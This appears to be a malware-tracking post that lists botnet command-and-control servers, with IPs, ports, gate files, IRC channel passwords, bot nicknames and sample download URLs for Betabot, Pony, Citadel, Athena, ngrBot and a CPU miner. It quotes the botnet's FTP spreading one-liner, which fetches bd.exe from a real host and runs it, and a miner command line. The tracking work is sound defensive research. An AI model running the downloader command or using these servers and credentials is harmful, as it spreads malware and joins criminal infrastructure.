Resolved: [priv8.blackunix.com] to [209.59.209.111]
Server: 209.59.209.111:5545
Server Password: ownz
Username: xcembmbr
Nickname: priv88qPCdHIIQo
The botnet spreads via FTP:
cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exit
strike-file-hosting.us (Betabot http botnet hosted by santrex.net)
Resolved strike-file-hosting.us to 46.166.184.109
Server: strike-file-hosting.us
Gate file: /b/order.php
Backup domain: gethostingfast.info
Based on the domain, I’d say that this is digitals.
Hosting infos: http://whois.domaintools.com/46.166.184.109
Sydnexoyex.us (Pony hosted in Germany Gunzenhausen Tt International D.o.o.)
Traffic by URL:
Sydnexoyex.us/p.exe
Sydnexoyex.us/4df1in1/gate.php
Sydnexoyex.us/DiBU064/s.exe
Sydnexoyex.us/DiBU064/st.exe
j.maxmind.com/app/geoip.js
euntsutviek.
More files here: hxxp://sydnexoyex.us/4df1in1/
Admin Panel: hxxp://sydnexoyex.us/4df1in1/admin.php
Hosting infos: http://whois.domaintools.com/176.9.208.113
highroller.pxnet.to (Betabot http botnet hosted by server4.pro)
Resolved highroller.pxnet.to to 176.31.53.143
Domain: highroller.pxnet.to
Port: 666
Gate file: /sbn-admin/order.php
Yes, the moron is hosting his HTTP server on the very spooky port 666 rather than the usual port 80.
Backup domains: sbn.pxnet.to cpstw.santros.ws ccc.santros.ws vg.allrounders.cc zp.swissfaking.biz
Now he uses a different IP:
highroller.pxnet.to 176.31.53.143
http://176.31.53.143/sbn-admin/order.php (highroller.pxnet.to)
Remote server: highroller.pxnet.to TCP port 666
googlesafebrowsing-counter.org (Citadel banking malware hosted by Fastflux botnet)
Server: googlesafebrowsing-counter.org
Config dropper: /file.php
The server seems to be poorly configured and it never returns a config file.
Backup domain: googlesafebrowsing-cache.org
Example fastflux info:
;; QUESTION SECTION:
;googlesafebrowsing-counter.org. IN A
;; ANSWER SECTION:
googlesafebrowsing-counter.org. 150 IN A 94.158.73.89
googlesafebrowsing-counter.org. 150 IN A 94.230.198.162
googlesafebrowsing-counter.org. 150 IN A 99.231.159.61
googlesafebrowsing-counter.org. 150 IN A 176.8.252.213
googlesafebrowsing-counter.org.
xjnhtraj.com (Athena irc botnet hosted by tatacommunications.com)
Server: xjnhtraj.com
Port: 6667
Channel: #xjnhtraj
Channel password: xjnhtraj
Opers:
[dwa] (dada@chidaica123): đuawa
[dwa] #xjnhtraj
[dwa] irc.server.net :IRC server
[dwa] is a Bot on IRC server
[dwa] idle 00:01:17, signon: Mon Mar 11 15:15:07
[dwa] End of WHOIS list.
[Troc] (trocdsds@chidaica123): Troc
[Troc] #xjnhtraj
[Troc] irc.server.net :IRC server
[Troc] is a Bot on IRC server
[Troc] idle 00:02:11, signon: Mon Mar 11
x1x4x0.su (snk asper mod irc botnet hosted by oneandone.net)
Server: x1x4x0.su (alternate domain phorpiex.su)
Port: 5050
Channel: #b
Topic for #b is: .j #m .d /100/97/111/124/49/59/47/96/100/124/114/74/123/122/46/115/125/109/49/117/108/63/39/53/40/48/51/16/45/62/35/63/69/107/55/34/37/35/17/44/83/85/100/110/108/61/108/114/122/10/73/102/97/114/
Topic for #b set by x at Mon Mar 11 12:15:31 2013
Topic for #m is: .s.a /100/97/111/124/49/59/47/58/58/63/58/18/33/47/46/34/35/51/48/34/53/63/102/121/115/105/43/64/100/105/ /100/97/111/124/49/59/47/58/58/63/58/18/33/47/46/34/35/51/48/34/53/63/ 327 pul4rn0t
Topic for #m set by x at Mon Mar 11 12:15:41 2013
Channel: #i
Sample: hxxp://217.160.213.35/pula.exe
Hosting infos:
us2.eclipsemc.com (Bitcoin Miner hosted in United States Kansas City Joe’s Datacenter Llc)
Mining for http://us2.eclipsemc.com:8337
Using CPU (1 threads)
Command Line: “C:file.exe” -o http://us2.eclipsemc.com:8337 -u m1nd_1 -p 13753216
Sample here
Hosting infos: http://whois.domaintools.com/69.195.155.226
199.229.249.189 (IRC botnet hosted in United States Atlanta Colo At 55 Llc)
Remote Host: 199.229.249.189
Port Number: 443
Local users: 131 / 4000
Current local users 131, max 4000
Global users: 140 / 4010
Current global users 140, max 4010
USER zwin- 127.0.0.1 localhost :Operation Dildos
NICK zwin-WHDKCF|1837|
JOIN #test :
JOIN #test3 :god
NICK zwin-TIGYPT|1952|
Hosting infos: http://whois.domaintools.com/199.229.249.189
altincopps.com (ngrBot hosted in United States Network Operations Center Inc.)
Server: 64.120.135.140:1434
Username: mmgamzu
Nickname: n{DE|XPa}mmgamzu
Channel: #mrag (Password: ngrBot)
Hosting infos: http://whois.domaintools.com/64.120.135.140